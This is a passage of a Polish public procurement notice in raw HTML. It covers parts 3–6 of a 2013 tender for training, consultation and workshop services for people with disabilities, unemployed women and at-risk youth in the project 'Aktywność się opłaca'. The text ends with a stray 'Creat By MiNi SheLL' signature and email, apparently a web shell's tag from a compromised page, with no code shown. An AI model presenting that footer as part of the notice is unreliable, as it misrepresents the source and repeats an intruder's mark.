Szczegółowy opis przedmiotu zamówienia dla cz. II zawarty jest w załączniku nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.52.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 23.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50.00</li>
<li>2. Doświadczenie zawodowe - 50.00</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonanie usług szkoleniowych polegających na zorganizowaniu i przeprowadzeniu szkoleń dla osób uczestniczących w projekcie Aktywność się opłaca - cz. III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 3 - Indywidualne konsultacje pedagogiczne dla 65 osób, w tym:
a) 4 godziny lekcyjne na osobę dla 56 osób niepełnosprawnych w stopniu lekkim i umiarkowanym, w planowanym terminie, tj.:
- grupa A (20 osób) od 2.09.2013r. do 6.09.2013 r. (pierwsze spotkanie -             2 godziny lekcyjne na osobę) i od 16.09.2013r. do 19.09.2013 r. (drugie spotkanie - 2 godziny lekcyjne na osobę),
- grupa B (18 osób) od 9.09.2013r. do 13.09.2013 r. (pierwsze spotkanie - 2 godziny lekcyjne na osobę) i od 23.09.2013r. do 27.09.2013 r. (drugie spotkanie - 2 godziny lekcyjne na osobę),
- grupa C (18 osób) - terminy konsultacji takie same jak w grupie B;
b) 6 godzin lekcyjnych na osobę dla 9 osób (kobiety bezrobotne i nieaktywne zawodowo, bezradne w sprawach opiekuńczo - wychowawczych i prowadzenia gospodarstwa domowego), w planowanym terminie, tj.:
- od 26.08.2013r. do 27.08.2013r.(pierwsze spotkanie - 2 godziny lekcyjne),
- od 9.09.2013r. do 10.09.2013r. (drugie spotkanie - 2 godziny lekcyjne),
- od 23.09.2013r. do 24.09.2013 r. (trzecie spotkanie - 2 godziny lekcyjne).
Szczegółowy opis przedmiotu zamówienia dla cz. III jest zawarty w załączniku nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.52.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50.00</li>
<li>2. Doświadczenie zawodowe - 50.00</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wykonanie usług szkoleniowych polegających na zorganizowaniu i przeprowadzeniu szkoleń dla osób uczestniczących w projekcie Aktywność się opłaca - cz. IV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część  4 - Warsztaty planowania kariery zawodowej dla 25 osób.
20 godzin lekcyjnych dla grupy 25 osobowej. Młodzież w wieku 15-25 lat (12 dziewcząt i 13 chłopców) z rodzin zagrożonych demoralizacją i wykluczeniem społecznym z powodu dziedziczenia biedy i uzależnienia od systemu pomocy społecznej, w planowanym terminie: 12,13,14 i 23.08.2013r.
Szczegółowy opis przedmiotu zamówienia dla cz. IV jest zawarty w załączniku nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.52.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 23.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50.00</li>
<li>2. Doświadczenie zawodowe - 50.00</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wykonanie usług szkoleniowych polegających na zorganizowaniu i przeprowadzeniu szkoleń dla osób uczestniczących w projekcie Aktywność się opłaca - cz. V.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część   5 - Warsztaty przygotowania do życia w rodzinie dla 25 osób.
25 godzin lekcyjnych dla grupy 25 osobowej. Młodzież w wieku 15-25 lat (12 dziewcząt i 13 chłopców) z rodzin zagrożonych demoralizacją i wykluczeniem społecznym z powodu dziedziczenia biedy i uzależnienia od systemu pomocy społecznej, w planowanym terminie: 26.08.2013r.-30.08.2013r. 
Szczegółowy opis przedmiotu zamówienia dla cz. V jest zawarty w załączniku nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.52.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50.00</li>
<li>2. Doświadczenie zawodowe - 50.00</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Wykonanie usług szkoleniowych polegających na zorganizowaniu i przeprowadzeniu szkoleń dla osób uczestniczących w projekcie Aktywność się opłaca - cz. VI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 6 - Warsztaty promocji zdrowia wraz z indywidualną konsultacją dietetyka dla 56 osób niepełnosprawnych, w tym:
20 godzin lekcyjnych dla każdej z trzech grup (łącznie 60 godzin lekcyjnych warsztatów) + 56 godzin zegarowych indywidualnych konsultacji z dietetykiem dla każdej osoby.
Planowany termin zajęć:
a) grupa A: 20 osób, w terminie od 9.09.2013r. do 12.09.2013 r. (zajęcia grupowe) i w terminie od 16.09.2013r. do 19.09.2013 r. (indywidualne konsultacje);
b) grupa B: 18 osób, w terminie od 2.09.2013r. do 5.09.2013r. (zajęcia grupowe) i w terminie od 6.09.2013r. do 13.09.2013r. (indywidualne konsultacje);
c) grupa C: 18 osób, w terminie od 2.09.2013r. do 5.09.2013r. (zajęcia grupowe) i w terminie od 6.09.2013r. do 13.09.2013r. (indywidualne konsultacje). 
Szczegółowy opis przedmiotu zamówienia dla cz. VI jest zawarty w załączniku nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.52.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50.00</li>
<li>2. Doświadczenie zawodowe - 50.00</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com